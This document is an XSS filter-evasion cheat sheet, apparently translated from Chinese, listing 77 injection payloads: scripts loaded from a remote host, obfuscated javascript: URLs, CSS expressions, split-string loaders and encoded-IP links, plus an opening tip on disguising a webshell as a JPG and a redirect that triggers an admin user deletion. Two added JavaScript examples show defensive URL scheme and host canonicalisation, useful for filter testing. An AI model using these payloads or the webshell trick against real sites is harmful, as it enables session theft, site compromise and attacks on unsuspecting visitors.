Cross-site image shell
XSS code: <script>alert("")</script>

Put the code in the first line of the webshell and rename the shell to a JPG image; when the image-format shell is requested, our shell still executes.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript directive
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolons, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Fixing a malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-digit UTF-8 Unicode encoding, no semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection; an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around length limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2. Null characters basically do not work in China, because there is nowhere to exploit them.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
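Items 3 through 19 all deliver the same javascript: directive under a different disguise: mixed case, numeric character references with and without semicolons, embedded tabs, newlines and null bytes, leading whitespace. A substring blacklist on the raw attribute value misses most of them, because the browser decodes and strips those characters before it looks at the scheme. The JavaScript below is an added example and not part of the cheat sheet: it canonicalises an attribute value roughly the way a browser's URL parser does (decode numeric references, drop NUL/tab/LF/CR, trim C0 controls and spaces) and then accepts only an allowlisted scheme, beside the naive blacklist it replaces. The function names and the sample values are constructed for this example.

```javascript
// Added example (not from the cheat sheet): canonicalise a URL-valued attribute
// before checking its scheme. Function names and samples are constructed.

const SAFE_SCHEMES = new Set(['http', 'https']);

// Decode numeric HTML character references: hex (&#x6A;) and decimal (&#106;),
// with or without the trailing semicolon and with any amount of zero padding.
function decodeNumericEntities(s) {
  const fromCode = (n) =>
    Number.isFinite(n) && n >= 0 && n <= 0x10ffff ? String.fromCodePoint(n) : '';
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, hex) => fromCode(parseInt(hex, 16)))
    .replace(/&#([0-9]+);?/g, (_, dec) => fromCode(parseInt(dec, 10)));
}

// Bring the value into the shape the browser's URL parser will actually see:
// decode references, drop NUL/tab/LF/CR anywhere, trim leading and trailing
// C0 controls and spaces (code points 0 to 32).
function canonicalizeUrl(value) {
  return decodeNumericEntities(String(value))
    .replace(/[\u0000\t\n\r]/g, '')
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '');
}

// Scheme of the canonical value, lower-cased; null when the URL is relative.
function urlScheme(value) {
  const m = /^([a-z][a-z0-9+.\-]*):/i.exec(canonicalizeUrl(value));
  return m ? m[1].toLowerCase() : null;
}

// Allowlist check: relative URLs and http(s) pass, every other scheme fails.
function isSafeUrl(value) {
  const scheme = urlScheme(value);
  return scheme === null || SAFE_SCHEMES.has(scheme);
}

// The check this replaces: a substring blacklist over the raw value.
// It returns true ("allowed") for most of the disguised samples below.
function naiveBlacklistAllows(value) {
  return !/javascript:|vbscript:/i.test(value);
}

// Constructed samples modelled on the IMG variants listed above.
const SAMPLES = [
  'http://3w.org/XSS/xss.js',
  '/relative/path.js',
  "javascript:alert('XSS')",
  "JaVaScRiPt:alert('XSS')",
  "jav&#x09;ascript:alert('XSS')", // encoded tab inside the scheme
  '&#106;&#97;&#118;&#97;script:alert(1)', // decimal references
  '&#0000106&#0000097&#0000118&#0000097script:alert(1)', // padded, no semicolons
  "java\u0000script:alert('XSS')", // embedded NUL
  "  \tjavascript:alert('XSS')", // leading whitespace
];

// Run both checks over the samples; one result row per sample.
function compareChecks(samples = SAMPLES) {
  return samples.map((v) => ({
    value: v,
    scheme: urlScheme(v),
    allowlist: isSafeUrl(v),
    blacklist: naiveBlacklistAllows(v),
  }));
}

for (const row of compareChecks()) {
  console.log(JSON.stringify(row));
}
```

The allowlist only decides the scheme; a protocol-relative value such as //3w.org/XSS/xss.js still passes it, so an off-site check on the host has to be a separate step. Decoding character references here is only correct for values that come out of an HTML attribute; a value already decoded by the HTML parser must not be decoded a second time.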
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) list-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters inserted (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url( javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">

(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression_r(alert('XSS'))">

(50) Anonymous tag with STYLE (an open angle bracket followed by a letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript in Flash to smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval_r(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing character filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL evasion
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) Decimal IP
<A HREF="http://3232235521">XSS</A>

(71) Hex IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting http:
<A HREF="//www.google.com/">XSS</A>

(75) Omitting www
<A HREF="http://google.com/">XSS</A>

(76) Trailing dot (absolute DNS name)
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
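Items 68 through 76 show why a host allowlist compared as a plain string is weak: the same address can be written as one decimal number, as hex or octal octets, with tabs and newlines inside the scheme, or with a trailing dot, and the browser resolves all of them to the same place. The JavaScript below is an added example and not part of the cheat sheet: it strips the characters browsers discard, pulls the host out of the URL, turns the numeric IPv4 spellings into dotted decimal and removes a trailing dot, and only then compares against an allowlist. Function names, the allowlist and the sample URLs are constructed for this example; the IPv4 part parsing is a simplified version of what browsers do and does not cover IPv6 literals.

```javascript
// Added example (not from the cheat sheet): canonicalise the host of a URL
// before comparing it with an allowlist. Names and samples are constructed.

// Parse one IPv4 "part" roughly as browsers do: 0x-prefixed hex, leading-0
// octal, otherwise decimal. Returns NaN for anything that is not a number.
function parseIPv4Part(p) {
  if (/^0x[0-9a-f]*$/i.test(p)) return p.length === 2 ? 0 : parseInt(p.slice(2), 16);
  if (/^0[0-7]*$/.test(p)) return p.length === 1 ? 0 : parseInt(p.slice(1), 8);
  if (/^[0-9]+$/.test(p)) return parseInt(p, 10);
  return NaN;
}

// Convert the 1 to 4 part numeric forms (3232235521, 0xc0.0xa8.0x00.0x01,
// 0300.0250.0000.0001, 66.000146.0x7.147, 127.1) to dotted decimal. The last
// part fills the remaining bytes. Returns null if the host is not numeric.
function canonicalIPv4(host) {
  const parts = host.split('.');
  if (parts.length > 4) return null;
  const nums = parts.map(parseIPv4Part);
  if (nums.some(Number.isNaN)) return null;
  const last = nums.pop();
  if (nums.some((n) => n > 255) || last >= 256 ** (4 - nums.length)) return null;
  let ip = last;
  nums.forEach((n, i) => { ip += n * 256 ** (3 - i); });
  return [ip >>> 24, (ip >>> 16) & 255, (ip >>> 8) & 255, ip & 255].join('.');
}

// Extract the host the way a lenient URL parser would: drop NUL/tab/LF/CR
// anywhere, trim, accept an optional scheme, strip userinfo and port,
// lower-case, and remove a trailing dot (absolute DNS name).
function extractHost(url) {
  const s = String(url).replace(/[\u0000\t\n\r]/g, '').trim();
  const m = /^(?:[a-z][a-z0-9+.\-]*:)?\/\/([^/?#]*)/i.exec(s);
  if (!m) return null;
  let host = m[1];
  const at = host.lastIndexOf('@');
  if (at !== -1) host = host.slice(at + 1);
  host = host.replace(/:[0-9]*$/, '');
  return host.toLowerCase().replace(/\.$/, '');
}

// Canonical host: dotted-decimal IPv4 where the host is numeric, else the
// lower-cased name without trailing dot; null when no host can be found.
function canonicalHost(url) {
  const host = extractHost(url);
  if (host === null) return null;
  return canonicalIPv4(host) || host;
}

function isAllowedHost(url, allowlist) {
  const host = canonicalHost(url);
  return host !== null && allowlist.has(host);
}

// Constructed allowlist and samples modelled on items 70 to 76 above.
const ALLOWED = new Set(['www.google.com', '66.102.7.147']);
const SAMPLES = [
  'http://www.google.com./',
  'http://3232235521/',
  'http://0xc0.0xa8.0x00.0x01/',
  'http://0300.0250.0000.0001/',
  'h\ntt\tp://6\t6.000146.0x7.147/',
  '//www.google.com/',
  'http://www.google.com.evil.example/',
];

for (const u of SAMPLES) {
  console.log(JSON.stringify(u), '->', canonicalHost(u), isAllowedHost(u, ALLOWED));
}
```

The comparison is done on the canonical host only after the scheme has been checked separately; a javascript: value has no host at all and canonicalHost returns null for it, so it never matches the allowlist.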